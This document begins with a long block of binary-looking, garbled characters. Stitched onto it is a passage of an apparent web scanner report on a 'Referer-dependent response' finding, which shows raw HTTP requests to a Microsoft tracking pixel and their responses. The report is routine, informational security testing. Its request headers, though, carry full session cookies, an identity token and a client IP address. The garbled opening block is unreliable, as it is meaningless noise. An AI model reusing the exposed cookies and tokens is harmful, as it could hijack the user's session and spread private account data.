p..n.J.z<.}#..>/.3.?..E..zs.t..8...\.w.e4F....4b....Z .d.6....g..@.....tj8y...= .4y.x!I.........h..XW...c...|Tf.....W..ZYo.....B.l..r=9.Rb...H.Q...}.~.    o2I....C.R...Z(......X.....q\G?.{...).][.............8..dc..>.......S....N+....5.yM.7x..4..^\l.....#....+...,.ob.......$CC...0Z...S=..M1..K2..3.._~v..U+......jI.I.K.l,D........kjdN..}...w........v....$..U....*    T........ED#P;...C>..^.. .m.....].(~=..}:.(..r2.    3........y..A..J9C...[.....[;....t..Q,.%......X..P,H.b*.Q.........n.....jU...m.K....)..I<G.7W.1..B....1G..C.".U...J.....V[......El.('s..V.L.h....6...j-?..p.M...E.z.....EI...d.@".Vs..S.U.....j..]..>..&.|&(........Gt...>-.C....# ....+..l..0N....l.k.o.Th.{.rnuK=..`z l.......<Y.2E.......7.op^.....a..n'.....s...5LEW..GH.....+b../.H).Q..@w0...f.J.`7K.]..q...E.S.u.6.9....SI.f...5/.J.....W...
q..1....V.....}&.&...F....n...yZ).-I......f.............../m..]..#. .6C..kG.)c.:.B'n...o\..".p1..u9....V7..i....x.q.yub.>R.... ....    [f.EA..\.K.`SH......5......j.K.|}]..v........1.....3D.0\.....KA.v..b....a...2....i.j..9:.n_..)......r...-/.;h'...J*..\....A.+......S.
..C.d. ................We.I?.)..7j.I....v).....oZ$.>..#.)....7I4.b*e.#...g:..y...R.=oq(p..u.T.z.^a.....AD.....@.F.)^..=A."........Yc.].....eF...MX...SYp...N.P...w.s.RH...]....~:0.p....u&.h]..H...p...B..X..P^g...q.....S..y.*f......W%..CI)Y.O..Z...D....$.x.)#.).l.B........q..9V..v5.....d...Y....g..|..~w%Cmz.)..\..7..~...T..|@[I...U......W..K..    .8l. yr...Ve.z.:..#e.Q....?.].d.M.....a.0......Q..$......Pl`_.s.t.,..ny5.R....    .K<....8.gi.tm..W.7....y`.....9m!..W..)..2e.y...F..s...|...:C.f.`.....])..*._u..m..Z.S..6g..T&(.>...5...S....'..U..6....l[732.y.rxH5]`..V?"..sZ.A..7.6E.||..-.M%(...8.u~.@CrVe...c.8}q..f.^....q.u..N'..]Wyk.<+.i.6.....$w.ICU.5.Ez.^.....'....n\Y"AdR*..xg....M.
y. :+m..`F.g.J...i..2q.h....r..d-....r.`.o...mS..Hzb..fN...=....j.E%UaI.@6.=...|.....fm..M...Z..&.;.v......v.i..j....%..D....8.QgM.A)&.*....S.4....H....\........y..M.y...P.b5WK&Z&."F.)..............K.+.Hx....D../.%.*=..@.....7..|2....7...z.ZH..s..{e%..:...N{.........q..4.C1@...S&..].`..*..q..[..*k.~...a..g..om6.ab$f............Xk\.yPWQ...v..v.Sb...>.:...,o.`...."...nh~E...Ltr.......5.N<)(*1(..".4...S...>......<. g..h#.......J..v......0.....WR.8y.X.g|..35.%.7.3{..Vm../....C.5..........6.X..YKJ...3R.?.!..}..v.(.33..F.o..r.M.L&....e..!i..(X.sz..3.GGR....P..B..{O.....:9%k:...(..^#n...D...3......A.....o...........S.
.R.z..o<...[2...u..W. TsiK]H..I....."3G.6..]..G...1T..g........_DXC...P.|.'...2@..\..Zo.'........d...........b...%3.......U...-..........UJq.<\..b....5\.u/.......|....
a.t.(N.%.w/......+;...........e..;../X..sS..z.ZU.h...n9b...^).s(I...^V!@........F.. &Y.%Z    . K.+.c&...T5&[...Eb.......c.........j...#....W......O.n.K..!I.R.y.
..X...xn-.!.....D.m..."..3....I
J..........M.q,l...{}_..|...z....u.._.....pa....:.e.....P...u{k'..~0v...m...,..=.....o.._$].7W0.o..l.]....`.*..%..6._.-P.....c*5&!N.e}.......j........>..).....zD..p..v..5...hC.....H..C.i...$P.rr.~._}.aHCR....`.}..@. g....1.[.....i..lD
.....q..f.._Z...F....YqOez/.I.......a..O{...;..w.T.5.....n.G....@....s...K.WDg.&7u.|3Y...Uo.....O6.V....s.....$g[Z#.y......b...&B    .\...6.g.....O/.....Xw.]:......u.j..T...6E....HX...Y.$D...PI..$...%..s|...}T...8Zxn_.-.+|.x..`z.+yn.r...a...........<....G_..4Yd......u[....5/(.D.t..}.*.l6.Y=.[~@.?.BB
N....0m.....l..5N..._):@t..$..M..B.    .it..J:..=.O...>..}4...44)."....z%...._.=.....X......7..6.f.UOr......L]W|F^...i;....PMUp........o..-..T.......F-.=.^..~...i.%...?.:......../.K....5.53..B.9.....L.:.z........    .NT.`.7.E...Se......<.....L$....J.c..g.c=..x.(\.^.X......$.<...!.\.    ..p..%.._.7r...@ ...?O.@.{.....k..K...=N..(.....`S.1#)..vu.x/.......c..g..z..Y....<....C..8"v....n.n.....|..6q......`,.va.=...l....RUy..j..^.G.S..C....=Yl.....DO.).>..$P.....Q5.p....P....a..`o~.`T.U^_..b..2.-..N..&'..`..GK....,.1qu4...o.o.o.P&.[%Q..TAX..%zU.[..'2...."    .k...........4.<.._w.......DG-.Fd-M.l..+..........$...    oozOr.63.{.rL%..1]......|I.8!.........2......A.fK.w...$../u.iw..N.$?]..N..>M....Q=OmN..?Fs+.1.......9.......He2.&.Bmf[-..Tr....'.j=!n.Y&...2.s&...c.......*..*."....7.....f.    .....{G..B.......#.n^b.k)z6.t.1..+......k..K.!.,..7..4..pV..I:J..N...k+x..X..2.J.i..eD.F.I!L..............
..;.N..x..].....
..h......
CZ3.f~{.j......t@U...C.^.d...l...h..c......T#.4z..j..b.....3.*.w..7a.#.+...-....v
...G....&....$...RBO.%..../......r..+..y..c.^........x?=.......id.....:.....]M..H.;....F7tU..O.d...n...p^......._...6.+~.....]./...q. ..........fP..SU.].{.A..}..:|g....JG...2..{.
f.7.g ....;..x.....T..
@...P....v...T!.8.T..
K*.e.b0E..|XM...ql....RP..}..........C..    n*x..^12.......    ..7R}......k...N..I..7..~9....wta..........d;...>.z...V7.8.Y....f.+.f.....n....qz.8.%)^%}....9I...8..[.a9E.gL..b]%N..
..1f..m......|...i...Q.*..o...$.'..H....$^.{9.=......5.....St..+61~........s...L...D......'(...._.4h.#<C......s..R.Kd..:....?21.._.....)..%P.z.q"K..BC)...    ....p..A....f.5GO.....I.8T.G........4......Y]].yW........P....A8.AsY_......~..rt!. ....&..b.......*S.]a..m%|.#~..6o.Uhl    ...C\ylQ.U!;D..c.&.....q...V..3.4.7d..m.\.k.1.8:....EC^..pr.D......o..4-.....1@-..{}.2...G.4...Q[._kAq.-..m.N...m._...*........R _.5}5..8..G...d.u.....\+..2..2...e..I../nL...[S..4.J..n,.h.o..sp.......*......@.F(..k........}^a>....w....w' -wAu.E..@.....@......Y.}/...x.7.Cf....k...wY..\@...L.
Q.W
..s...q...{(.....F...
.R...B.p...$..Z.e.......J..a...t......N..]./i.p<(....5{.
x.9sfB    .......a...].0.:.v98T.#..o..C..M........'..!...So....^}bc".v.[.........    ..."1.=EY~u..Y..-.....{..4T)..\....V......K..i..HR.^L.Ls....ot
..4a....g.+:....IsG...........h....~.bi...T..r...............4j$..w.n..ZC.......kv....yOG{7v...z'.7........q.C..gB4...|.|.w.n.C.x!B..aG.q.+.Z.r......2t.f..j3j.X5..........1.T........t..g'Z(B.;...u.(O.Y..nL.G.....
..1.t(@.?...}.........&z.."%..H#z...mC,.......].k......K..Dn.\k..2...,P...BT..[+.pn.rH.&..aN    ...=.^.f..t.MI.tS.......iH.J...I..DQ~    .z.d=......._@.5.M..nkp...%.A?R.J.\'".}0./...*)#..s..
.........} =.C.[.7...f.....?{.M.....Jj.,...
|.6.&e..T./s.pf........~sr....6lAv./    kH.@....l.k...........Lc....WP|.ZNn........{.:8.....2.1.]......-1U..PJ......>..o.y6....Q.{J..J9...)g.y.A.`...Ag..Ut.....F...!L...xcA..Wp........`\.2.......}Y./.4..q.*....1.]]e.z.`.Ctu...+..a..)U.....6...!>0}.g.p..m.)R....%.]W.`d..B...glz;r...t..g....;Z.y)...C].Nw..2......<.hK.......D...6>A.q.$.\.*I).N>...A.].........k6s.i_.2..\.<Q..?\...yK$3.b..Ds..o
WAnm .>......=.xYDp......$*BVO..RF.d......OjJ;...=.SB\.cr,..
.F1O.../..y.,$..9...mJ..@.tej".....r=..\d.......r....
..I..`..D..i..Yr..<;.SJ.......;.fD.X.-I.......?./..a...}qV..3O.G]......5.A......D..T...e|......j..3..........U.$'.(I8...~M}....
...._.%*..}g....NB.....8.......<T...~.).z.....Zb..X.........t
........E(.Hy.-.j........d../......6A...J.1...<.v.....?......%wh0.J.aV.......2.oh...@.......7F............ C..(5.. .PAg....a...Rv.."|..._#....F........W.f......."}..]....U....-p.....B\...].{....=i$v.e.r.......n.*;iV..x.m..4....JCsH.J;.......Q8.!.....Qr...f.....s
..,..../.....f2%....gF....c...~.....}.@.O..Q.u-'f......j.....6..../;.{Z.....f7....%.0o#.a.VS&.#.@......b..9....T./.H.....%%..1.o...x....C...~...;<]..,.kl. .<<J8q......I.B'7..`
.C.*.5*..}6..w-+........M.b+....E.....M8.>y..1....c^rv ..=.w.VF]X.(.Cd.....-M{........o...............I.
.. q.k.....g.....'>....4.k.j.P...} \1...o$..;..._.....I."S.~..@&............R\....&....O.....kW)N.d.({...#.PZ.d..)....;H..l..7SF.k...Q.?8...)P.a...D...K..".o.....W.vK..YiJ..lC.6/..    v}..Kbe`.....m.../4.../XD..X.+...-.'...B....50.U_.d..{<.....#.er..O.J4...c.z.8......S4..]...I..F..y.K~....h.bl......?....!..7`....rk...)..I......Yn<..A.........O.Nb5..T`...$..-Y.Z.5.=./.....C.]S....R....I.........'c1.....#.2...J}.\.cg.J..........&0..p..z.M.....W!lX.../...i......!.J...kE.?-..F.o...o{.C-...g.j..X. 82...m.....V..H..}(T.1KJ..H..Z..mu..JW6a.,!@...Hz................*}$.%`...th.....I.......P7O..Q....;.{+.z.E'.a8 ...61S@&    .......-...Q....N..p..C...)V.....(.....83..p...p..M.\!..6..XKy,./..:....o.b.wQ9.R.k&...Y%n&...\tX.~.v...dt....,.V.#.....IO.-\.m}..>m...J.W.=...T.Oh.K....'.........r.#H.G..[]...F.Z..r...........
.K".d.......yU......;.x.0T-?...A.Sni..Kt....N.k~1u...e}J... .'....sDF|.......Z..$.....z..H.].x.W...d.h...dfq4bU.p.kLx r.k..)..)-...I.K.7..P.n"H..E.....-e......jjy.%.7.I.`..m..:.......@'. .?..2=?...b...`...n..........,.......}..bY..Q......... ...
X.1i......K#.X...u..`..@..8.....PT...=..k...8o&.......D..UH...[ .j......}...!....>..m..+D?A...G1Y..O....9.d.WKcd..Vj..*.bs.4...6...h.......S..XPo...q'B.-..)I.$U..[......C....z.....Y.3...)..........~..k.....cH...    b......GZ..&5hD    !I.W....dk...S...KE.>8..y..80.RN.`.S6......sVc.....g]:...:..Q...
................7..    ...}.N..X.4..A...S..P.......Z.P... ....-.-F..T..H...... .......p...9:'
L...-    $..&...=.ZSF..A'....:"......}...uN.A.z`.......MMkX..J..N.={...$.y.5..u...9...a....T...+.b....xO    ...9..2b..w........|....LG..?..h.%.oIP.~...5.M.,...C....;.TB..{kYm..PE...vN/..v...t:.oCoV.|.....W_.f./S;.18M..i.0..57.~...c.~..8...DS..:.'...k....yRr.....iv.....[.L2.W.....R/.~T..C..,......3Y|.@...M.9......@pt..9..@...6..8.h~i..U.Z.,/W.(b./.Y...VH..X...../......g.
...gU.$<.........A^.g..G.Z!.....N(l....c..j.......#O~S.:...6.K..........a.......T..d ...1._..l.wd...?## 9......(...W...u(vrO.s@.`".k........Kv3..m.)1...Q..$.S3.'.VF.k.8.$T.;...L..0q?...|..C5..)IUc..@.l..:fX.mq,.Q.......*.....n."..B.Z.D....Y]Q.e..v..._.<..vy. ..RT5;.Th|....=F.6v.~.u....h}:p...%"^z.G{...3..e/..?...s..............d........]..-..j.w..............SP.m..^.q.b.:.)l.Wj.......X...Ob.x;..`Y.D....8E.>{......................o4.J..6.i)'I...65E.......yT.&95s...v;......a...* ^.............j...=tW.W...l.<....T[.d7...[P.....t.... ..t. ...&=r..._
.7.x.[..`h.a.k..Zd.....|Mg. .z....B..4.JfV`................>.:....k@...e.:%.aQ..0.G.6...7L.eP.F. e....%..K..Kf.]...].@+cz.3...V.....m.........(k.Q..`..P-...K...IK%..-cR..
m.E....i52..6VH......
.t8...IA...I(.M%..(....7....=.
.. ...$.......^...|Q.lE..v@...........j.km....G...n)+E.....4.#.c....]...e.77.?..?....Ln..v!..}.d.rpl..W...JhQ....0_b..@z.& .7...,~..n.@.(..c.7-..."..1E2..KRe..(vm....:..\xp. ..RcD..E.A.....4..$.^.`.E.......j......1.....?]......\.D.M.]t.......+...j.$..f.~...=.pE....D\..@9:..DFt......``....7@.S.R..L.ux2..i..5...lSf>..\s...el.............^.:..Q.._><E....H!.P...f..3.h...N1..`.-.......=.wUg..O..." 2-..#[7]..gJr.@`....aW(.L-G.[..zHO.oX_D...7H../....\.......e<..d...$..!i.s.D...e"x..H.....0.W
H.....|.......3.....
8....d.V..#{.....4....14!..:.....E......Qwi...1..    V.b..$....G..zn....W....%._..Cf...P..z.]w..."T.Ym8y....*.......r'qr..Q +.8.M......
.F"l..7.
.*;.$g.{..4.B.T1=x.z}../XG.r_....s...g...i.<BAp.'.....0.YT...M..zn...Bn..(.Y!.h...-;........O-..U5?.kW?..........^.....>.V...C..'O.^.%3..p....;.@.R
v)EZ,...k..o/.C.0._'...q..b...\..4.....y..%.S...    .g.
|..q.VC.....*,...%.Q...H)K=...+...e.l..... .Z.?.q-4A.f7..........+....:[...k?.9.
'.YPH'..X.V]....a.'f.......q....z..m...2j....mX.JR....r..../.K..)...A....+..................+A!p.....v...J..l.Zo.....z...k..Ik0.~-...u.G..i..S.E.u.H''W.I
.;.j.....v.@FM....JF(........*!d.s.7...5....`..@M.te..P.h.....f......?}.pc....N{AQ.&........9.4...0.C..H..;......E=.J?M...B.=]....M...U......t.(.)p.O.!.....w.q..;k..vp....C.+...Tw...    .;D.d_X"b.o.2..Hju......w.<2C...V.J......I.P3.........WA.pP1.N....k..q..7.I5.....k.]....7..nu.4h..A.J=1Rt....(+....iYv..T.12|rw......6.y.O..I..v......oq.......N.P*.ei.O..].\.a.....oj.....1.........n."...`u2H...l .y......vA.............:<%/_.Hu.....P={J
f.    ..x...c.~.{.(.I....z.........(~z..:...#..6..s..{.,s}.L.#..ZD(\....uz.M.|0`Zp.Q#P......p.T.    .x.D..~jv......[.=..FS......l.L...7^a...d..R.m..-....7h.(5...,.H7....W.....>........#...g.}",L.....x.nt..............5.9gh{.....;....J....u.i.+.-X...q....6Ph..z.M`..b..}..3e.XT'...?bx.....
y...X.f%.)aM..P3e...E.V ......../..K....o.....>z.@.mB.8.......(SYH.(.$.X..J.N.4..}.`.....M.5J....s+....r...4wu~.U{.........$../...l..R...,.......L.....s4...?I....V..F.myA. C.<D@.
....Q}../E.t..\...
6.R4.=..2;.....4oJ*N.Vy......s..f....6.......*........);......v.QW.p..K@.@r1.8...?x..%........D.e.....Y.....p...o...#..hg...<..3k.5"E.^..P...K......D...Z.......>....V.+.j..x..,...>e....*......K..M.....I....DDLJ.N0Lb.J...    ].K....n.n.@....I...lg.t..3....,..&.+.)s.!.%...w*.gQ.}w...'..o.o=..P..$.n...;v...}f...)l*pR....*.>C.5..*...F.=...ff.[6..#.....\J.D.4.~...[-Q.....9.....W.Zxy<&.v.er.#Z.{".....nt...?`...@.....pV..-H...T...w.e.{.G.......rF...:.......[..t...I.n!*    ..a.t. BO.../u=..........    T..s...A)..9=.J.9.|...%!.,J.S.".F5...5....C...s......Z$...6#L,.7.bJ.I._R-(<..LjU..-..>Y5n*EP..{........}.e.....2f.......P....p....-.......P.\gq.Ya.J..?ig..Q,..jDrq.H..3....7d_....Z#I..H.>eE.2..1y>..Na..%D$.....4C.....m.x....>...DZ...P...s..\g....O.M........"....l.....*.@..+Q`...h...+.3.6.(..Hg5e.e..^..S..k@b..B..oL..
qVQ.."......1..........0@Hd.q;A..%8i...,......."b.....j+.X.)7.........O Ud.@.. ..Q    $Lfy......._.
..^.n....h7..r!...*?..?b..........,+.*......g...    d..p..<..5.......    ......S.p.c..f.CZ.7    .c......|.<.l...5.y....(...2.`_o.........{....>;..#... ...|...giI.P.!G...Q...T..X..y.....}.."......}..    J..i./.)E^..,..@....n..!`IWL....C.$3.t...[..:;..G..[XL+G.E...l.j....S.......G..>ERh1.>..RJ33:....K."j...."..w..s....*....0{.C...0......`....=....^eDE..J.+h...Kr]bhR.d>.`L.....N.f.t.LH...m...[.^;,i...;...Uc........0.$Y(.{.r........&5..G90+
~..s..w...W...C6;....}.
!}.Hb.i&..{k`.*&F4~..........'.m~...HW^!....pm.....q5.?g.P..................V.L...........d....s....}..W.h....C.j.0.I.n.........s.....|.b,i    ..T.......+Qo..G..sm..=1l..8..X.I.&@..0BG...~...;x......6....Pqyv..d.ZJV..?mO...R{.{........X..DKVA..MoYo+.u]@r....`\....g>..^-nP.v........E.U......=..M..Ck............!.q....C..L...S..7.su|?#..Z..L..._*..J.h.^.F.........TK.5..h.y.....w^...ziRK.S_..
....i..-....v..W..l.
.}.d...G7H]:...\
Y\J.BL.$...I...&!.7.....Z5..`...F&Y.=/x.i9;...V.`".a......K..u..&..c.=.D..0.qgk..yQ.o.L.8.K..8....4..[I.t.|..G.1......W.bHI.......t-b..d.iM5../t...
;...B.\,.....KX.e.*L&...#...>.".yDnF....3.......$..    j........h.q...I)..0...R.B....].Bc.`w>.+.=.d........4+rtQ....U).{x.S7.2.R........2.....9.
..,P....k.6...7.%W{D......5d\......n.. .    .z.......T......-.P..h@.'D........%wn.......d.Mv.Ci..o..GQ.L..O..k..h....=/J....>....4....x.
0....n./..s...:..Xz9....o[.......%...x.B$.j\...z...#l.$z.~6n\
m...6Q{}..rV..Ll...}..2>....^.|{u.........Cy.0Vz:B..u...h...2.sGNjh5.....5..J'.aH...}.J.R.7.[..&.L.c..zbF'....S...........C.|}j...l..Q.....q..t%.Q.g..e."...+.*..@fn.......m.;.3.:W.n..z...7..b.....,.c.j..]B.)1!~Y7.ajh..._...gm..Zv..:
.@..*8.<....~..k....O..*b,;A..U.pI..qI.......\........?.U..+...p...S...f+.L..k.......{../.....a......1.j....3?g..Yp.
.cF8........:n...M..G....s;.2.........@.+..%.S.C..N.K-.....X.j.2..U..`.Y...Kg)H...6]..N...w...
.-..........G....].....ldYS......-.w.T.oeEH...Y.........}....U..m.Wd.N...c...)_e9B.......U.M.\DbUN..;.....1..........g.."...G.6...-..Bh.....u.vQ.1k"W.^....,.6.{T.U{...f....W.    .EU...%....$..C~S.V>o.n ..#.B.    ...7..[.Ap.'..... ....../.    ..|.x.C.+.@Ys@O...........w.<......kK[.....Dg....)..w.
8.....I/@.u.5].SV..q|.]..._.
.......V_...?.!.....5pzy.O...8.]$..F.NM+.0h(...{ .r....W...$.......6._......l.w..t+..C.l_4PI...'...0]:...4-y.Rxv.8....n..9.....T....1..2w+.a................h.....i.vm..y..6    v..*.yb...-/.w.@`..P5m.>...%.'.h.I../>.a.......z$..a?^...j.G4o.....;.q..h%.......<~*.l..{...h..4.1.V....c..,=..K.Bs..X#^y."....O....$3.l.z:...7.......z..%>..M.<.`.."QQ......5Q..e
.l*....
..D..ms...wZP...X......C..z.V+...... ....2R...7,u..a.....b....O......._YKNf.y.......0c....s..d?.h...].uK....j8..A...5....8.....@...1IdEy.f....~jo`. ..J....{.......q.)U...;S..'.{u.>FY..!.Y......8...li....../...(..Q.owC.B|.4.. ...=m.b.<o....w.q......U....r.#,.f...o...;.K..\..B......4..Yr.6-,o
.L...{........a...+.....,=.1..Oux.=.....pF..VV......G$[....R....}".....t....{...P.........<3uV;O..T........nw...$.(..U.c...TI.*.}.|B..U...,...N........FA#......;<p.....cz9.[.&J<..CA.r....... N..1..,..X....l...!...O......,...,_..A B.....b....q.7.R..?>.Z....e......x......h......e/...8..).C.p..<E].\.
......rbx.+..Ww...tda.;z..._...E.`|..K.i=...)..."...MC.{J....m....!W.Z.l.."3.....n..Bt#T.U..0....zu.....C..3...iz..o......H.uH...#    .k..y1..#..F..Q|..>
...[SNIP]...
18. Referer-dependent response  previous  next
There are 14 instances of this issue:

Issue description

The application's responses appear to depend systematically on the presence or absence of the Referer header in requests. This behaviour does not necessarily constitute a security vulnerability, and you should investigate the nature of and reason for the differential responses to determine whether a vulnerability is present.

Common explanations for Referer-dependent responses include:

Issue remediation

The Referer header is not a robust foundation on which to build any security measures, such as access controls or defences against cross-site request forgery. Any such measures should be replaced with more secure alternatives that are not vulnerable to Referer spoofing.

If the contents of responses is updated based on Referer data, then the same defences against malicious input should be employed here as for any other kinds of user-supplied data.

18.1. http://c.microsoft.com/trans_pixel.asp  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://c.microsoft.com
Path:   /trans_pixel.asp

Request 1

GET /trans_pixel.asp?source=technet&TYPE=PV&uri=%2fen-us%2fmagazine(d%3ddefault)%2fgg537292(l%3den-us%2cv%3dMSDN.10).aspx&p=_en-us_magazine(d=default)_gg537292(l=en-us,v=MSDN.10).aspx HTTP/1.1
Host: c.microsoft.com
Proxy-Connection: keep-alive
Referer: http://technet.microsoft.com/en-us/magazine/gg537292.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=688642bf9d16e14b952901540959fda0&HASH=bf42&LV=20112&V=3; MUID=FA3AE6176FAC4414AD6FC26C726B4B15; __unam=289c965-12e721b8405-5ba8ac9c-2; _opt_vi_LECG2UZC=70FF57B5-618B-4C89-A6E0-AEEFB08346CB; R=200027254-3/8/2011 14:53:52; _opt_vi_06F86FDK=742B89EE-F086-4032-9920-451B209CBC09; msdn=L=1033; WT_NVR_RU=0=technet|msdn:1=:2=; MSID=Microsoft.CreationDate=02/15/2011 21:42:53&Microsoft.LastVisitDate=03/26/2011 00:57:21&Microsoft.VisitStartDate=03/26/2011 00:57:21&Microsoft.CookieId=cdefcdbc-cd58-426e-a2b9-6d4d032c5554&Microsoft.TokenId=0242265b-d73d-484f-a494-b6344e553cef&Microsoft.NumberOfVisits=23&Microsoft.IdentityToken=plYFWp/Sav9RboFYJDENknWK0M3HKGRxExSO3ZthrhvxePoaRD543/4jCDtpABDhXvGu6hYw2p7w2OmmFcnnIATCsqP2cDLpwOaak2MSqpcwaZgium6WkbxRI/3lfq0Gws5gcoTO900VpbrWwnZWkk0h7DvuOUy8fvvcOIGUata8oggRE3IuQrAHBEdOSC/VqwuxZuA8KPU+oVMW2WeVUbt/xABiD8cXjH/eMrCCuxuZz35IbR8vQoULMMLVcABNmxQVsXvFb9OdB+JXJYi7RA0KQqL3iTcg1W/EF1rgR0gVqEcUWJN4qVllIbUGiU8N0wicUcjkNMpnYKw6LUumclx6R3aZQ45I51JtrotJDDVuP0DWwWnW13onH24nmUTXBZBOheXFYzynksZs2l8NLvKjXhpdbbc9j9a1dbb4rMVVXHpY30MRfbCM47a1gnmlVVOW+qUz6A30GY5CvEOLiGN25+nvYeNS7r4egZVUUXGtCCTuwHLaMByKYLNBjzcYx+KFLbPw3vUTZZB9kkHuQTlG3YCkF73XUqeC+mr8Xi8=&Microsoft.MicrosoftId=0189-2123-7087-5274&Microsoft.CookieFirstVisit=1; _opt_vi_DANG4OLL=49D92CA5-D4F7-41F0-8DD6-1130EED19BA3; _opt_vt_DANG4OLL=202FA024DB; ADS=SN=175A21EF; ASP.NET_SessionId=ibbdu345amsbmpibe0301ljz; MS0=2a3c4c9fe97247d48c9a5163057b9a69; A=I&I=AxUFAAAAAAAABwAADIe+FnxFI293k92k7DipMA!!&CS=126gi\00018@E0H02h8@E0H; WT_FPC=id=173.193.214.243-1295665472.30133593:lv=1301092921512:ss=1301092848759; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1301103723737%7D%2C%22lastinvited%22%3A1301103723737%2C%22userid%22%3A%2213011037237379667073420714586%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; omniID=ue; s_cc=true; s_sq=%5B%5BB%5D%5D

Response 1

HTTP/1.1 200 OK
Content-Type: image/gif
Server: Microsoft-IIS/7.5
Set-Cookie: MS0=2a3c4c9fe97247d48c9a5163057b9a69; domain=.microsoft.com; expires=Sat, 26-Mar-2011 02:11:20 GMT; path=/
Set-Cookie: A=I&I=AxUFAAAAAAAABwAADIe+FnxFI293k92k7DipMA!!&CS=126gi]0001:@E0I02h:@E0I; domain=.microsoft.com; expires=Tue, 26-Mar-2041 01:41:20 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 26 Mar 2011 01:41:20 GMT
Content-Length: 44

GIF89a........3....!.......,........@...Q.;.

Request 2

GET /trans_pixel.asp?source=technet&TYPE=PV&uri=%2fen-us%2fmagazine(d%3ddefault)%2fgg537292(l%3den-us%2cv%3dMSDN.10).aspx&p=_en-us_magazine(d=default)_gg537292(l=en-us,v=MSDN.10).aspx HTTP/1.1
Host: c.microsoft.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=688642bf9d16e14b952901540959fda0&HASH=bf42&LV=20112&V=3; MUID=FA3AE6176FAC4414AD6FC26C726B4B15; __unam=289c965-12e721b8405-5ba8ac9c-2; _opt_vi_LECG2UZC=70FF57B5-618B-4C89-A6E0-AEEFB08346CB; R=200027254-3/8/2011 14:53:52; _opt_vi_06F86FDK=742B89EE-F086-4032-9920-451B209CBC09; msdn=L=1033; WT_NVR_RU=0=technet|msdn:1=:2=; MSID=Microsoft.CreationDate=02/15/2011 21:42:53&Microsoft.LastVisitDate=03/26/2011 00:57:21&Microsoft.VisitStartDate=03/26/2011 00:57:21&Microsoft.CookieId=cdefcdbc-cd58-426e-a2b9-6d4d032c5554&Microsoft.TokenId=0242265b-d73d-484f-a494-b6344e553cef&Microsoft.NumberOfVisits=23&Microsoft.IdentityToken=plYFWp/Sav9RboFYJDENknWK0M3HKGRxExSO3ZthrhvxePoaRD543/4jCDtpABDhXvGu6hYw2p7w2OmmFcnnIATCsqP2cDLpwOaak2MSqpcwaZgium6WkbxRI/3lfq0Gws5gcoTO900VpbrWwnZWkk0h7DvuOUy8fvvcOIGUata8oggRE3IuQrAHBEdOSC/VqwuxZuA8KPU+oVMW2WeVUbt/xABiD8cXjH/eMrCCuxuZz35IbR8vQoULMMLVcABNmxQVsXvFb9OdB+JXJYi7RA0KQqL3iTcg1W/EF1rgR0gVqEcUWJN4qVllIbUGiU8N0wicUcjkNMpnYKw6LUumclx6R3aZQ45I51JtrotJDDVuP0DWwWnW13onH24nmUTXBZBOheXFYzynksZs2l8NLvKjXhpdbbc9j9a1dbb4rMVVXHpY30MRfbCM47a1gnmlVVOW+qUz6A30GY5CvEOLiGN25+nvYeNS7r4egZVUUXGtCCTuwHLaMByKYLNBjzcYx+KFLbPw3vUTZZB9kkHuQTlG3YCkF73XUqeC+mr8Xi8=&Microsoft.MicrosoftId=0189-2123-7087-5274&Microsoft.CookieFirstVisit=1; _opt_vi_DANG4OLL=49D92CA5-D4F7-41F0-8DD6-1130EED19BA3; _opt_vt_DANG4OLL=202FA024DB; ADS=SN=175A21EF; ASP.NET_SessionId=ibbdu345amsbmpibe0301ljz; MS0=2a3c4c9fe97247d48c9a5163057b9a69; A=I&I=AxUFAAAAAAAABwAADIe+FnxFI293k92k7DipMA!!&CS=126gi\00018@E0H02h8@E0H; WT_FPC=id=173.193.214.243-1295665472.30133593:lv=1301092921512:ss=1301092848759; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1301103723737%7D%2C%22lastinvited%22%3A1301103723737%2C%22userid%22%3A%2213011037237379667073420714586%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; omniID=ue; s_cc=true; s_sq=%5B%5BB%5D%5D

Response 2

HTTP/1.1 200 OK
Content-Type: image/gif
Server: Microsoft-IIS/7.5
Set-Cookie: MS0=2a3c4c9fe97247d48c9a5163057b9a69; domain=.microsoft.com; expires=Sat, 26-Mar-2011 02:12:28 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 26 Mar 2011 01:42:28 GMT
Content-Length: 44

GIF89a........3....!.......,........@...Q.;.
18.2. http://fast.fonts.com/d/ccdadc2e-26c9-48a5-9c52-9c3cc58e9930.ttf  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://fast.fonts.com
Path:   /d/ccdadc2e-26c9-48a5-9c52-9c3cc58e9930.ttf

Request 1

